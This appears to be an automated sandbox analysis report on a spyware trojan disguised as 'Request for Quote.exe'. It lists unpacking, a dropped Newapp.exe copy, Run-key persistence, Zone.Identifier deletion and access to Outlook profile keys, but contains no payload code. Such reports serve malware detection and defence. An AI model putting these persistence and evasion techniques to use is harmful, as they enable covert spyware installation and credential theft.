Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_0143EAE8	5_2_0143EAE8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_01430586	5_2_01430586
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_0143C668	5_2_0143C668
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_014371B0	5_2_014371B0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_0143F5C0	5_2_0143F5C0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01572178	14_2_01572178
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01571028	14_2_01571028
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015717E0	14_2_015717E0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_0157EC50	14_2_0157EC50
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01572FE0	14_2_01572FE0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01572168	14_2_01572168
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015750C8	14_2_015750C8
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015750B9	14_2_015750B9
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01575318	14_2_01575318
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01575308	14_2_01575308
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01575590	14_2_01575590
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01575581	14_2_01575581
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015704D2	14_2_015704D2
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015704E0	14_2_015704E0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015717D0	14_2_015717D0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01575798	14_2_01575798
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_015757A8	14_2_015757A8
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01574A50	14_2_01574A50
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01574A60	14_2_01574A60
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01574D68	14_2_01574D68
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01570F21	14_2_01570F21
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01572F9A	14_2_01572F9A
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01570F88	14_2_01570F88
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01573E90	14_2_01573E90
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01573EA0	14_2_01573EA0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDFC68	14_2_02FDFC68
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FD82D0	14_2_02FD82D0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDA0B0	14_2_02FDA0B0
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDA0A1	14_2_02FDA0A1
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDC7B8	14_2_02FDC7B8
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDC7A9	14_2_02FDC7A9
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FD8730	14_2_02FD8730
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FD8B48	14_2_02FD8B48
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FD8B38	14_2_02FD8B38
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDCE30	14_2_02FDCE30
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FDCDF8	14_2_02FDCDF8
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_0967C350	14_2_0967C350
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_0967782E	14_2_0967782E
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09675DE8	14_2_09675DE8
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09675DDB	14_2_09675DDB
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09673F88	14_2_09673F88
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09701048	14_2_09701048
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09700040	14_2_09700040
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09700016	14_2_09700016
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 20_2_019B4860	20_2_019B4860
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 20_2_019B4790	20_2_019B4790
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 20_2_019BDBC0	20_2_019BDBC0

Source: Request for Quote.exe	Binary or memory string: OriginalFilename vs Request for Quote.exe
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs Request for Quote.exe
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamedoOqGWMpIYencJvzbUkLaMlQGw.exe4 vs Request for Quote.exe
Source: Request for Quote.exe, 00000000.00000002.255811808.000000000ABA0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Request for Quote.exe
Source: Request for Quote.exe, 00000000.00000000.227538059.0000000000282000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameOpFlags.exe< vs Request for Quote.exe
Source: Request for Quote.exe, 00000000.00000002.254880635.000000000A9A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Request for Quote.exe
Source: Request for Quote.exe	Binary or memory string: OriginalFilename vs Request for Quote.exe
Source: Request for Quote.exe, 00000005.00000002.497343586.0000000000C42000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameOpFlags.exe< vs Request for Quote.exe
Source: Request for Quote.exe, 00000005.00000002.511879488.0000000006390000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Request for Quote.exe
Source: Request for Quote.exe, 00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamedoOqGWMpIYencJvzbUkLaMlQGw.exe4 vs Request for Quote.exe
Source: Request for Quote.exe, 00000005.00000002.498162050.00000000010F8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quote.exe
Source: Request for Quote.exe, 00000005.00000002.502647164.0000000001400000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs Request for Quote.exe
Source: Request for Quote.exe	Binary or memory string: OriginalFilenameOpFlags.exe< vs Request for Quote.exe

Source: Request for Quote.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Request for Quote.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Newapp.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 20.2.Newapp.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 20.2.Newapp.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/4@2/1

Source: C:\Users\user\Desktop\Request for Quote.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quote.exe.log

Jump to behavior

Source: Request for Quote.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Request for Quote.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Request for Quote.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Request for Quote.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: Request for Quote.exe	Virustotal: Detection: 28%
Source: Request for Quote.exe	ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\Request for Quote.exe

File read: C:\Users\user\Desktop\Request for Quote.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Request for Quote.exe 'C:\Users\user\Desktop\Request for Quote.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Request for Quote.exe C:\Users\user\Desktop\Request for Quote.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe 'C:\Users\user\AppData\Roaming\Newapp\Newapp.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe 'C:\Users\user\AppData\Roaming\Newapp\Newapp.exe'
Source: C:\Users\user\Desktop\Request for Quote.exe	Process created: C:\Users\user\Desktop\Request for Quote.exe C:\Users\user\Desktop\Request for Quote.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Request for Quote.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Request for Quote.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	Unpacked PE file: 0.2.Request for Quote.exe.280000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Unpacked PE file: 14.2.Newapp.exe.a80000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Unpacked PE file: 21.2.Newapp.exe.3f0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	Unpacked PE file: 0.2.Request for Quote.exe.280000.0.unpack
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Unpacked PE file: 14.2.Newapp.exe.a80000.0.unpack
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Unpacked PE file: 21.2.Newapp.exe.3f0000.0.unpack

Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_00285464 push 97205ACAh; retf	0_2_00285482
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_00283F94 push es; ret	0_2_00284004
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_002852D8 push ecx; retf	0_2_002852DD
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_00283FD6 push es; ret	0_2_00284004
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02596A6E push ecx; retf	0_2_02596A6F
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02596D62 push F297BACAh; retf	0_2_02596D67
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB9AFA0 push eax; ret	0_2_0AB9AFA1
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C43FD6 push es; ret	5_2_00C44004
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C42ED2 push ds; iretd	5_2_00C42EE0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C452D8 push ecx; retf	5_2_00C452DD
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C42AEB push eax; retf	5_2_00C42AF8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C43F94 push es; ret	5_2_00C44004
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C45464 push 97205ACAh; retf	5_2_00C45482
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_00C42E3B push 00000027h; retf	5_2_00C42E46
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_0141B5F7 push edi; retn 0000h	5_2_0141B5F9
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_00A83F94 push es; ret	14_2_00A84004
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_00A852D8 push ecx; retf	14_2_00A852DD
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_00A83FD6 push es; ret	14_2_00A84004
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_00A85464 push 97205ACAh; retf	14_2_00A85482
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01576A6E push ecx; retf	14_2_01576A6F
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_01576D62 push F297BACAh; retf	14_2_01576D67
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FD9ED1 push ecx; ret	14_2_02FD9EE5
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_02FD5FF4 push eax; iretd	14_2_02FD5FF5
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_0967AFA0 push eax; ret	14_2_0967AFA1
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 14_2_09704145 push FFFFFF8Bh; iretd	14_2_09704147
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 15_2_00282E3B push 00000027h; retf	15_2_00282E46
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 15_2_00285464 push 97205ACAh; retf	15_2_00285482
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 15_2_00283F94 push es; ret	15_2_00284004
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 15_2_00282AEB push eax; retf	15_2_00282AF8
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 15_2_002852D8 push ecx; retf	15_2_002852DD
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Code function: 15_2_00282ED2 push ds; iretd	15_2_00282EE0

Source: initial sample	Static PE information: section name: .text entropy: 7.52597216215
Source: initial sample	Static PE information: section name: .text entropy: 7.52597216215

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\Request for Quote.exe

File created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe

Jump to dropped file

Boot Survival:

Source: C:\Users\user\Desktop\Request for Quote.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Newapp			Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Newapp			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe

File opened: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
